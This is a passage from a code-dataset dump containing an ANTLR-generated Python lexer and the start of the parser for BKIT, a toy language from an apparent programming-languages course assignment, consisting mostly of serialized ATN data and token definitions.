buf.write(\"\\36\\3\\2\\2\\2\\u009e\\u00a0\\5\\7\\4\\2\\u009f\\u009e\\3\\2\\2\\2\\u00a0\")\n buf.write(\"\\u00a1\\3\\2\\2\\2\\u00a1\\u009f\\3\\2\\2\\2\\u00a1\\u00a2\\3\\2\\2\\2\")\n buf.write(\"\\u00a2 \\3\\2\\2\\2\\u00a3\\u00a4\\7\\62\\2\\2\\u00a4\\u00a8\\7q\\2\")\n buf.write(\"\\2\\u00a5\\u00a6\\7\\62\\2\\2\\u00a6\\u00a8\\7Q\\2\\2\\u00a7\\u00a3\")\n buf.write(\"\\3\\2\\2\\2\\u00a7\\u00a5\\3\\2\\2\\2\\u00a8\\u00aa\\3\\2\\2\\2\\u00a9\")\n buf.write(\"\\u00ab\\5\\33\\16\\2\\u00aa\\u00a9\\3\\2\\2\\2\\u00ab\\u00ac\\3\\2\\2\")\n buf.write(\"\\2\\u00ac\\u00aa\\3\\2\\2\\2\\u00ac\\u00ad\\3\\2\\2\\2\\u00ad\\\"\\3\\2\")\n buf.write(\"\\2\\2\\u00ae\\u00b2\\5\\37\\20\\2\\u00af\\u00b2\\5\\35\\17\\2\\u00b0\")\n buf.write(\"\\u00b2\\5!\\21\\2\\u00b1\\u00ae\\3\\2\\2\\2\\u00b1\\u00af\\3\\2\\2\\2\")\n buf.write(\"\\u00b1\\u00b0\\3\\2\\2\\2\\u00b2$\\3\\2\\2\\2\\u00b3\\u00b4\\5\\17\\b\")\n 
buf.write(\"\\2\\u00b4&\\3\\2\\2\\2\\u00b5\\u00b9\\7$\\2\\2\\u00b6\\u00b8\\5\\27\")\n buf.write(\"\\f\\2\\u00b7\\u00b6\\3\\2\\2\\2\\u00b8\\u00bb\\3\\2\\2\\2\\u00b9\\u00b7\")\n buf.write(\"\\3\\2\\2\\2\\u00b9\\u00ba\\3\\2\\2\\2\\u00ba\\u00bc\\3\\2\\2\\2\\u00bb\")\n buf.write(\"\\u00b9\\3\\2\\2\\2\\u00bc\\u00bd\\7$\\2\\2\\u00bd(\\3\\2\\2\\2\\u00be\")\n buf.write(\"\\u00bf\\7t\\2\\2\\u00bf\\u00c0\\7g\\2\\2\\u00c0\\u00c1\\7v\\2\\2\\u00c1\")\n buf.write(\"\\u00c2\\7w\\2\\2\\u00c2\\u00c3\\7t\\2\\2\\u00c3\\u00c4\\7p\\2\\2\\u00c4\")\n buf.write(\"*\\3\\2\\2\\2\\u00c5\\u00c6\\7k\\2\\2\\u00c6\\u00c7\\7p\\2\\2\\u00c7\")\n buf.write(\"\\u00c8\\7v\\2\\2\\u00c8,\\3\\2\\2\\2\\u00c9\\u00ca\\7h\\2\\2\\u00ca\")\n buf.write(\"\\u00cb\\7n\\2\\2\\u00cb\\u00cc\\7q\\2\\2\\u00cc\\u00cd\\7c\\2\\2\\u00cd\")\n buf.write(\"\\u00ce\\7v\\2\\2\\u00ce.\\3\\2\\2\\2\\u00cf\\u00d0\\7-\\2\\2\\u00d0\")\n buf.write(\"\\60\\3\\2\\2\\2\\u00d1\\u00d2\\7/\\2\\2\\u00d2\\62\\3\\2\\2\\2\\u00d3\")\n buf.write(\"\\u00d4\\7,\\2\\2\\u00d4\\64\\3\\2\\2\\2\\u00d5\\u00d6\\7\\61\\2\\2\\u00d6\")\n buf.write(\"\\66\\3\\2\\2\\2\\u00d7\\u00d8\\7*\\2\\2\\u00d88\\3\\2\\2\\2\\u00d9\\u00da\")\n buf.write(\"\\7+\\2\\2\\u00da:\\3\\2\\2\\2\\u00db\\u00dc\\7]\\2\\2\\u00dc<\\3\\2\\2\")\n buf.write(\"\\2\\u00dd\\u00de\\7_\\2\\2\\u00de>\\3\\2\\2\\2\\u00df\\u00e0\\7}\\2\")\n buf.write(\"\\2\\u00e0@\\3\\2\\2\\2\\u00e1\\u00e2\\7\\177\\2\\2\\u00e2B\\3\\2\\2\\2\")\n buf.write(\"\\u00e3\\u00e4\\7<\\2\\2\\u00e4D\\3\\2\\2\\2\\u00e5\\u00e6\\7\\60\\2\")\n buf.write(\"\\2\\u00e6F\\3\\2\\2\\2\\u00e7\\u00e8\\7=\\2\\2\\u00e8H\\3\\2\\2\\2\\u00e9\")\n buf.write(\"\\u00ea\\7.\\2\\2\\u00eaJ\\3\\2\\2\\2\\u00eb\\u00ec\\7?\\2\\2\\u00ec\")\n buf.write(\"L\\3\\2\\2\\2\\u00ed\\u00f2\\5\\3\\2\\2\\u00ee\\u00f1\\5\\3\\2\\2\\u00ef\")\n buf.write(\"\\u00f1\\5\\7\\4\\2\\u00f0\\u00ee\\3\\2\\2\\2\\u00f0\\u00ef\\3\\2\\2\\2\")\n buf.write(\"\\u00f1\\u00f4\\3\\2\\2\\2\\u00f2\\u00f0\\3\\2\\2\\2\\u00f2\\u00f3\\3\")\n 
buf.write(\"\\2\\2\\2\\u00f3N\\3\\2\\2\\2\\u00f4\\u00f2\\3\\2\\2\\2\\u00f5\\u00f9\")\n buf.write(\"\\7$\\2\\2\\u00f6\\u00f8\\5\\27\\f\\2\\u00f7\\u00f6\\3\\2\\2\\2\\u00f8\")\n buf.write(\"\\u00fb\\3\\2\\2\\2\\u00f9\\u00f7\\3\\2\\2\\2\\u00f9\\u00fa\\3\\2\\2\\2\")\n buf.write(\"\\u00fa\\u00fc\\3\\2\\2\\2\\u00fb\\u00f9\\3\\2\\2\\2\\u00fc\\u00fd\\5\")\n buf.write(\"\\21\\t\\2\\u00fdP\\3\\2\\2\\2\\u00fe\\u0102\\7$\\2\\2\\u00ff\\u0101\")\n buf.write(\"\\5\\27\\f\\2\\u0100\\u00ff\\3\\2\\2\\2\\u0101\\u0104\\3\\2\\2\\2\\u0102\")\n buf.write(\"\\u0100\\3\\2\\2\\2\\u0102\\u0103\\3\\2\\2\\2\\u0103\\u0105\\3\\2\\2\\2\")\n buf.write(\"\\u0104\\u0102\\3\\2\\2\\2\\u0105\\u0106\\7\\2\\2\\3\\u0106R\\3\\2\\2\")\n buf.write(\"\\2\\u0107\\u0108\\7,\\2\\2\\u0108\\u0109\\7,\\2\\2\\u0109\\u010d\\3\")\n buf.write(\"\\2\\2\\2\\u010a\\u010c\\13\\2\\2\\2\\u010b\\u010a\\3\\2\\2\\2\\u010c\")\n buf.write(\"\\u010f\\3\\2\\2\\2\\u010d\\u010e\\3\\2\\2\\2\\u010d\\u010b\\3\\2\\2\\2\")\n buf.write(\"\\u010e\\u0110\\3\\2\\2\\2\\u010f\\u010d\\3\\2\\2\\2\\u0110\\u0111\\7\")\n buf.write(\",\\2\\2\\u0111\\u0112\\7,\\2\\2\\u0112\\u0113\\3\\2\\2\\2\\u0113\\u0114\")\n buf.write(\"\\b*\\2\\2\\u0114T\\3\\2\\2\\2\\u0115\\u0116\\7,\\2\\2\\u0116\\u0117\")\n buf.write(\"\\7,\\2\\2\\u0117\\u011b\\3\\2\\2\\2\\u0118\\u011a\\13\\2\\2\\2\\u0119\")\n buf.write(\"\\u0118\\3\\2\\2\\2\\u011a\\u011d\\3\\2\\2\\2\\u011b\\u011c\\3\\2\\2\\2\")\n buf.write(\"\\u011b\\u0119\\3\\2\\2\\2\\u011c\\u011e\\3\\2\\2\\2\\u011d\\u011b\\3\")\n buf.write(\"\\2\\2\\2\\u011e\\u011f\\7\\2\\2\\3\\u011fV\\3\\2\\2\\2\\u0120\\u0121\")\n buf.write(\"\\t\\13\\2\\2\\u0121X\\3\\2\\2\\2\\u0122\\u0124\\t\\f\\2\\2\\u0123\\u0122\")\n buf.write(\"\\3\\2\\2\\2\\u0124\\u0125\\3\\2\\2\\2\\u0125\\u0123\\3\\2\\2\\2\\u0125\")\n buf.write(\"\\u0126\\3\\2\\2\\2\\u0126\\u0127\\3\\2\\2\\2\\u0127\\u0128\\b-\\2\\2\")\n buf.write(\"\\u0128Z\\3\\2\\2\\2\\31\\2cglrx|\\177\\u008d\\u0097\\u009c\\u00a1\")\n 
buf.write(\"\\u00a7\\u00ac\\u00b1\\u00b9\\u00f0\\u00f2\\u00f9\\u0102\\u010d\")\n buf.write(\"\\u011b\\u0125\\3\\b\\2\\2\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n Integer_literal = 1\n Float_literal = 2\n String_literal = 3\n RETURN = 4\n INT = 5\n FLOAT = 6\n PLUS_INT = 7\n MINUS_INT = 8\n STAR_INT = 9\n DIV_INT = 10\n LEFT_PAREN = 11\n RIGHT_PAREN = 12\n LEFT_BRACKET = 13\n RIGHT_BRACKET = 14\n LEFT_BRACE = 15\n RIGHT_BRACE = 16\n COLON = 17\n DOT = 18\n SEMI = 19\n COMMA = 20\n ASSIGN = 21\n ID = 22\n ILLEGAL_ESCAPE = 23\n UNCLOSE_STRING = 24\n COMMENT = 25\n UNTERMINATED_COMMENT = 26\n ERROR_CHAR = 27\n WS = 28\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'+'\", \"'-'\", \"'*'\", \"'/'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \n \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\", \"'='\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"Integer_literal\", \"Float_literal\", \"String_literal\", \"RETURN\", \n \"INT\", \"FLOAT\", \"PLUS_INT\", \"MINUS_INT\", \"STAR_INT\", \"DIV_INT\", \n \"LEFT_PAREN\", \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \n \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \n \"ASSIGN\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \n \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\" ]\n\n ruleNames = [ \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \"LETTER\", \n \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \"ILL_ESC_SEQUENCE\", \n \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \"STRING_CHAR\", \n \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \"DECIMAL\", \n \"OCTAL\", \"Integer_literal\", \"Float_literal\", \"String_literal\", \n \"RETURN\", \"INT\", \"FLOAT\", \"PLUS_INT\", \"MINUS_INT\", \"STAR_INT\", \n 
\"DIV_INT\", \"LEFT_PAREN\", \"RIGHT_PAREN\", \"LEFT_BRACKET\", \n \"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \n \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \"ID\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \n \"WS\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n\n" }, { "alpha_fraction": 0.49371516704559326, "alphanum_fraction": 0.5526729822158813, "avg_line_length": 33.85365295410156, "blob_id": "aac05ec2db0f1d71dd4133f3db35ec1635919bae", "content_id": "ec82632fd474801b7fa52df2dfb700c01cd369e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116948, "license_type": "no_license", "max_line_length": 455, "num_lines": 3355, "path": "/Assignments/assignment1/target/main/bkit/parser/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3M\")\n buf.write(\"\\u01ba\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n 
buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\")\n buf.write(\"\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\\t\\23\")\n buf.write(\"\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\\4\\31\")\n buf.write(\"\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\\t\\36\")\n buf.write(\"\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\\4&\\t\")\n buf.write(\"&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\3\\2\\3\\2\\3\\2\\7\\2Z\\n\\2\")\n buf.write(\"\\f\\2\\16\\2]\\13\\2\\3\\2\\7\\2`\\n\\2\\f\\2\\16\\2c\\13\\2\\3\\2\\3\\2\\3\")\n buf.write(\"\\3\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\5\\4q\\n\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\4\\3\\4\\3\\4\\7\\4x\\n\\4\\f\\4\\16\\4{\\13\\4\\3\\4\\7\\4~\\n\\4\\f\")\n buf.write(\"\\4\\16\\4\\u0081\\13\\4\\3\\4\\3\\4\\3\\4\\3\\5\\3\\5\\3\\5\\3\\5\\3\\6\\3\\6\")\n buf.write(\"\\3\\7\\3\\7\\3\\b\\3\\b\\3\\b\\5\\b\\u0091\\n\\b\\3\\b\\3\\b\\3\\b\\5\\b\\u0096\")\n buf.write(\"\\n\\b\\7\\b\\u0098\\n\\b\\f\\b\\16\\b\\u009b\\13\\b\\5\\b\\u009d\\n\\b\\3\")\n buf.write(\"\\b\\3\\b\\3\\t\\3\\t\\5\\t\\u00a3\\n\\t\\3\\t\\3\\t\\3\\t\\5\\t\\u00a8\\n\\t\")\n buf.write(\"\\7\\t\\u00aa\\n\\t\\f\\t\\16\\t\\u00ad\\13\\t\\3\\n\\3\\n\\3\\13\\3\\13\\3\")\n buf.write(\"\\13\\3\\13\\6\\13\\u00b5\\n\\13\\r\\13\\16\\13\\u00b6\\3\\13\\5\\13\\u00ba\")\n buf.write(\"\\n\\13\\3\\f\\3\\f\\3\\f\\3\\f\\5\\f\\u00c0\\n\\f\\3\\f\\3\\f\\6\\f\\u00c4\")\n buf.write(\"\\n\\f\\r\\f\\16\\f\\u00c5\\3\\r\\3\\r\\3\\r\\3\\r\\6\\r\\u00cc\\n\\r\\r\\r\")\n buf.write(\"\\16\\r\\u00cd\\3\\r\\5\\r\\u00d1\\n\\r\\3\\r\\3\\r\\3\\r\\5\\r\\u00d6\\n\")\n buf.write(\"\\r\\3\\16\\3\\16\\3\\16\\3\\16\\3\\17\\3\\17\\3\\17\\3\\17\\3\\20\\3\\20\\3\")\n buf.write(\"\\20\\7\\20\\u00e3\\n\\20\\f\\20\\16\\20\\u00e6\\13\\20\\3\\21\\3\\21\\3\")\n buf.write(\"\\21\\7\\21\\u00eb\\n\\21\\f\\21\\16\\21\\u00ee\\13\\21\\3\\21\\7\\21\\u00f1\")\n 
buf.write(\"\\n\\21\\f\\21\\16\\21\\u00f4\\13\\21\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\")\n buf.write(\"\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\")\n buf.write(\"\\3\\22\\3\\22\\3\\22\\5\\22\\u0109\\n\\22\\3\\23\\3\\23\\3\\23\\3\\23\\3\")\n buf.write(\"\\23\\3\\23\\3\\23\\3\\23\\3\\23\\7\\23\\u0114\\n\\23\\f\\23\\16\\23\\u0117\")\n buf.write(\"\\13\\23\\3\\23\\3\\23\\5\\23\\u011b\\n\\23\\3\\23\\3\\23\\3\\23\\3\\24\\3\")\n buf.write(\"\\24\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\")\n buf.write(\"\\3\\25\\3\\25\\3\\25\\3\\26\\3\\26\\3\\26\\3\\26\\3\\26\\3\\26\\3\\26\\3\\27\")\n buf.write(\"\\3\\27\\3\\27\\3\\27\\3\\27\\3\\27\\3\\27\\3\\30\\3\\30\\5\\30\\u013f\\n\")\n buf.write(\"\\30\\3\\30\\3\\30\\3\\30\\3\\31\\3\\31\\3\\32\\3\\32\\3\\33\\3\\33\\3\\34\")\n buf.write(\"\\3\\34\\5\\34\\u014c\\n\\34\\3\\35\\3\\35\\3\\35\\3\\35\\3\\36\\3\\36\\3\")\n buf.write(\"\\37\\3\\37\\3 \\3 \\3 \\3 \\3 \\5 \\u015b\\n \\3!\\3!\\3!\\3!\\3!\\3!\")\n buf.write(\"\\7!\\u0163\\n!\\f!\\16!\\u0166\\13!\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\")\n buf.write(\"\\7\\\"\\u016e\\n\\\"\\f\\\"\\16\\\"\\u0171\\13\\\"\\3#\\3#\\3#\\3#\\3#\\3#\\7\")\n buf.write(\"#\\u0179\\n#\\f#\\16#\\u017c\\13#\\3$\\3$\\3$\\5$\\u0181\\n$\\3%\\3\")\n buf.write(\"%\\3%\\5%\\u0186\\n%\\3&\\3&\\3&\\3&\\5&\\u018c\\n&\\3\\'\\3\\'\\5\\'\\u0190\")\n buf.write(\"\\n\\'\\3(\\3(\\3(\\3(\\3(\\5(\\u0197\\n(\\3)\\3)\\3)\\5)\\u019c\\n)\\3\")\n buf.write(\"*\\3*\\3*\\3*\\3*\\7*\\u01a3\\n*\\f*\\16*\\u01a6\\13*\\7*\\u01a8\\n\")\n buf.write(\"*\\f*\\16*\\u01ab\\13*\\3*\\3*\\3+\\3+\\3+\\3+\\3+\\3+\\3+\\3+\\3+\\5\")\n buf.write(\"+\\u01b8\\n+\\3+\\2\\5@BD,\\2\\4\\6\\b\\n\\f\\16\\20\\22\\24\\26\\30\\32\")\n buf.write(\"\\34\\36 \\\"$&(*,.\\60\\62\\64\\668:<>@BDFHJLNPRT\\2\\b\\3\\2\\4\\7\")\n buf.write(\"\\3\\2)\\63\\3\\2\\'(\\3\\2\\35 \\3\\2!%\\3\\2\\37 \\2\\u01bf\\2[\\3\\2\\2\")\n 
buf.write(\"\\2\\4f\\3\\2\\2\\2\\6j\\3\\2\\2\\2\\b\\u0085\\3\\2\\2\\2\\n\\u0089\\3\\2\\2\")\n buf.write(\"\\2\\f\\u008b\\3\\2\\2\\2\\16\\u008d\\3\\2\\2\\2\\20\\u00a2\\3\\2\\2\\2\\22\")\n buf.write(\"\\u00ae\\3\\2\\2\\2\\24\\u00b9\\3\\2\\2\\2\\26\\u00bb\\3\\2\\2\\2\\30\\u00d0\")\n buf.write(\"\\3\\2\\2\\2\\32\\u00d7\\3\\2\\2\\2\\34\\u00db\\3\\2\\2\\2\\36\\u00df\\3\")\n buf.write(\"\\2\\2\\2 \\u00ec\\3\\2\\2\\2\\\"\\u0108\\3\\2\\2\\2$\\u010a\\3\\2\\2\\2&\")\n buf.write(\"\\u011f\\3\\2\\2\\2(\\u0121\\3\\2\\2\\2*\\u012e\\3\\2\\2\\2,\\u0135\\3\")\n buf.write(\"\\2\\2\\2.\\u013e\\3\\2\\2\\2\\60\\u0143\\3\\2\\2\\2\\62\\u0145\\3\\2\\2\")\n buf.write(\"\\2\\64\\u0147\\3\\2\\2\\2\\66\\u0149\\3\\2\\2\\28\\u014d\\3\\2\\2\\2:\\u0151\")\n buf.write(\"\\3\\2\\2\\2<\\u0153\\3\\2\\2\\2>\\u015a\\3\\2\\2\\2@\\u015c\\3\\2\\2\\2\")\n buf.write(\"B\\u0167\\3\\2\\2\\2D\\u0172\\3\\2\\2\\2F\\u0180\\3\\2\\2\\2H\\u0185\\3\")\n buf.write(\"\\2\\2\\2J\\u018b\\3\\2\\2\\2L\\u018f\\3\\2\\2\\2N\\u0196\\3\\2\\2\\2P\\u019b\")\n buf.write(\"\\3\\2\\2\\2R\\u019d\\3\\2\\2\\2T\\u01b7\\3\\2\\2\\2VW\\5\\4\\3\\2WX\\7<\")\n buf.write(\"\\2\\2XZ\\3\\2\\2\\2YV\\3\\2\\2\\2Z]\\3\\2\\2\\2[Y\\3\\2\\2\\2[\\\\\\3\\2\\2\")\n buf.write(\"\\2\\\\a\\3\\2\\2\\2][\\3\\2\\2\\2^`\\5\\6\\4\\2_^\\3\\2\\2\\2`c\\3\\2\\2\\2\")\n buf.write(\"a_\\3\\2\\2\\2ab\\3\\2\\2\\2bd\\3\\2\\2\\2ca\\3\\2\\2\\2de\\7\\2\\2\\3e\\3\")\n buf.write(\"\\3\\2\\2\\2fg\\7\\30\\2\\2gh\\7:\\2\\2hi\\5\\20\\t\\2i\\5\\3\\2\\2\\2jk\\7\")\n buf.write(\"\\23\\2\\2kl\\7:\\2\\2lp\\7\\3\\2\\2mn\\7\\25\\2\\2no\\7:\\2\\2oq\\5\\36\")\n buf.write(\"\\20\\2pm\\3\\2\\2\\2pq\\3\\2\\2\\2qr\\3\\2\\2\\2rs\\7\\b\\2\\2sy\\7:\\2\\2\")\n buf.write(\"tu\\5&\\24\\2uv\\7<\\2\\2vx\\3\\2\\2\\2wt\\3\\2\\2\\2x{\\3\\2\\2\\2yw\\3\")\n buf.write(\"\\2\\2\\2yz\\3\\2\\2\\2z\\177\\3\\2\\2\\2{y\\3\\2\\2\\2|~\\5\\\"\\22\\2}|\\3\")\n buf.write(\"\\2\\2\\2~\\u0081\\3\\2\\2\\2\\177}\\3\\2\\2\\2\\177\\u0080\\3\\2\\2\\2\\u0080\")\n 
buf.write(\"\\u0082\\3\\2\\2\\2\\u0081\\177\\3\\2\\2\\2\\u0082\\u0083\\7\\17\\2\\2\")\n buf.write(\"\\u0083\\u0084\\7;\\2\\2\\u0084\\7\\3\\2\\2\\2\\u0085\\u0086\\7\\3\\2\")\n buf.write(\"\\2\\u0086\\u0087\\7>\\2\\2\\u0087\\u0088\\5\\16\\b\\2\\u0088\\t\\3\\2\")\n buf.write(\"\\2\\2\\u0089\\u008a\\t\\2\\2\\2\\u008a\\13\\3\\2\\2\\2\\u008b\\u008c\")\n buf.write(\"\\5\\16\\b\\2\\u008c\\r\\3\\2\\2\\2\\u008d\\u009c\\78\\2\\2\\u008e\\u0091\")\n buf.write(\"\\5\\n\\6\\2\\u008f\\u0091\\5\\f\\7\\2\\u0090\\u008e\\3\\2\\2\\2\\u0090\")\n buf.write(\"\\u008f\\3\\2\\2\\2\\u0091\\u0099\\3\\2\\2\\2\\u0092\\u0095\\7=\\2\\2\")\n buf.write(\"\\u0093\\u0096\\5\\n\\6\\2\\u0094\\u0096\\5\\f\\7\\2\\u0095\\u0093\\3\")\n buf.write(\"\\2\\2\\2\\u0095\\u0094\\3\\2\\2\\2\\u0096\\u0098\\3\\2\\2\\2\\u0097\\u0092\")\n buf.write(\"\\3\\2\\2\\2\\u0098\\u009b\\3\\2\\2\\2\\u0099\\u0097\\3\\2\\2\\2\\u0099\")\n buf.write(\"\\u009a\\3\\2\\2\\2\\u009a\\u009d\\3\\2\\2\\2\\u009b\\u0099\\3\\2\\2\\2\")\n buf.write(\"\\u009c\\u0090\\3\\2\\2\\2\\u009c\\u009d\\3\\2\\2\\2\\u009d\\u009e\\3\")\n buf.write(\"\\2\\2\\2\\u009e\\u009f\\79\\2\\2\\u009f\\17\\3\\2\\2\\2\\u00a0\\u00a3\")\n buf.write(\"\\5\\24\\13\\2\\u00a1\\u00a3\\5\\30\\r\\2\\u00a2\\u00a0\\3\\2\\2\\2\\u00a2\")\n buf.write(\"\\u00a1\\3\\2\\2\\2\\u00a3\\u00ab\\3\\2\\2\\2\\u00a4\\u00a7\\7=\\2\\2\")\n buf.write(\"\\u00a5\\u00a8\\5\\24\\13\\2\\u00a6\\u00a8\\5\\30\\r\\2\\u00a7\\u00a5\")\n buf.write(\"\\3\\2\\2\\2\\u00a7\\u00a6\\3\\2\\2\\2\\u00a8\\u00aa\\3\\2\\2\\2\\u00a9\")\n buf.write(\"\\u00a4\\3\\2\\2\\2\\u00aa\\u00ad\\3\\2\\2\\2\\u00ab\\u00a9\\3\\2\\2\\2\")\n buf.write(\"\\u00ab\\u00ac\\3\\2\\2\\2\\u00ac\\21\\3\\2\\2\\2\\u00ad\\u00ab\\3\\2\")\n buf.write(\"\\2\\2\\u00ae\\u00af\\7\\3\\2\\2\\u00af\\23\\3\\2\\2\\2\\u00b0\\u00b4\")\n buf.write(\"\\7\\3\\2\\2\\u00b1\\u00b2\\7\\66\\2\\2\\u00b2\\u00b3\\7\\4\\2\\2\\u00b3\")\n buf.write(\"\\u00b5\\7\\67\\2\\2\\u00b4\\u00b1\\3\\2\\2\\2\\u00b5\\u00b6\\3\\2\\2\")\n 
buf.write(\"\\2\\u00b6\\u00b4\\3\\2\\2\\2\\u00b6\\u00b7\\3\\2\\2\\2\\u00b7\\u00ba\")\n buf.write(\"\\3\\2\\2\\2\\u00b8\\u00ba\\7\\3\\2\\2\\u00b9\\u00b0\\3\\2\\2\\2\\u00b9\")\n buf.write(\"\\u00b8\\3\\2\\2\\2\\u00ba\\25\\3\\2\\2\\2\\u00bb\\u00c3\\7\\3\\2\\2\\u00bc\")\n buf.write(\"\\u00bf\\7\\66\\2\\2\\u00bd\\u00c0\\5\\26\\f\\2\\u00be\\u00c0\\5> \\2\")\n buf.write(\"\\u00bf\\u00bd\\3\\2\\2\\2\\u00bf\\u00be\\3\\2\\2\\2\\u00c0\\u00c1\\3\")\n buf.write(\"\\2\\2\\2\\u00c1\\u00c2\\7\\67\\2\\2\\u00c2\\u00c4\\3\\2\\2\\2\\u00c3\")\n buf.write(\"\\u00bc\\3\\2\\2\\2\\u00c4\\u00c5\\3\\2\\2\\2\\u00c5\\u00c3\\3\\2\\2\\2\")\n buf.write(\"\\u00c5\\u00c6\\3\\2\\2\\2\\u00c6\\27\\3\\2\\2\\2\\u00c7\\u00cb\\7\\3\")\n buf.write(\"\\2\\2\\u00c8\\u00c9\\7\\66\\2\\2\\u00c9\\u00ca\\7\\4\\2\\2\\u00ca\\u00cc\")\n buf.write(\"\\7\\67\\2\\2\\u00cb\\u00c8\\3\\2\\2\\2\\u00cc\\u00cd\\3\\2\\2\\2\\u00cd\")\n buf.write(\"\\u00cb\\3\\2\\2\\2\\u00cd\\u00ce\\3\\2\\2\\2\\u00ce\\u00d1\\3\\2\\2\\2\")\n buf.write(\"\\u00cf\\u00d1\\5\\22\\n\\2\\u00d0\\u00c7\\3\\2\\2\\2\\u00d0\\u00cf\")\n buf.write(\"\\3\\2\\2\\2\\u00d1\\u00d2\\3\\2\\2\\2\\u00d2\\u00d5\\7>\\2\\2\\u00d3\")\n buf.write(\"\\u00d6\\5\\f\\7\\2\\u00d4\\u00d6\\5\\n\\6\\2\\u00d5\\u00d3\\3\\2\\2\\2\")\n buf.write(\"\\u00d5\\u00d4\\3\\2\\2\\2\\u00d6\\31\\3\\2\\2\\2\\u00d7\\u00d8\\5\\26\")\n buf.write(\"\\f\\2\\u00d8\\u00d9\\7>\\2\\2\\u00d9\\u00da\\5\\16\\b\\2\\u00da\\33\")\n buf.write(\"\\3\\2\\2\\2\\u00db\\u00dc\\5\\22\\n\\2\\u00dc\\u00dd\\7>\\2\\2\\u00dd\")\n buf.write(\"\\u00de\\5\\n\\6\\2\\u00de\\35\\3\\2\\2\\2\\u00df\\u00e4\\5\\24\\13\\2\")\n buf.write(\"\\u00e0\\u00e1\\7=\\2\\2\\u00e1\\u00e3\\5\\24\\13\\2\\u00e2\\u00e0\")\n buf.write(\"\\3\\2\\2\\2\\u00e3\\u00e6\\3\\2\\2\\2\\u00e4\\u00e2\\3\\2\\2\\2\\u00e4\")\n buf.write(\"\\u00e5\\3\\2\\2\\2\\u00e5\\37\\3\\2\\2\\2\\u00e6\\u00e4\\3\\2\\2\\2\\u00e7\")\n buf.write(\"\\u00e8\\5&\\24\\2\\u00e8\\u00e9\\7<\\2\\2\\u00e9\\u00eb\\3\\2\\2\\2\")\n 
